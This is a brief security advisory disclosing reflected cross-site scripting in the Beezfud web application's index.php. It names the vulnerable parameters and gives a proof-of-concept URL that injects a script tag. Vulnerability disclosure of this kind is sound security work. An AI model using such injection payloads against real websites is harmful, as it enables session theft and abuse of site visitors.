================================================================================
# Beezfud Cross Site Scripting
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 10/02/2016
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-xss.txt
================================================================================
# Vulnerable File : index.php
# PoC :
http://localhost/beezfud/index.php?parameter=;Html Inject Here;
Vulnerable Parameters : lookback , max , range , latest , earliest
Example :
http://localhost/beezfud/index.php?lookback="><script>alert(1)</script>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================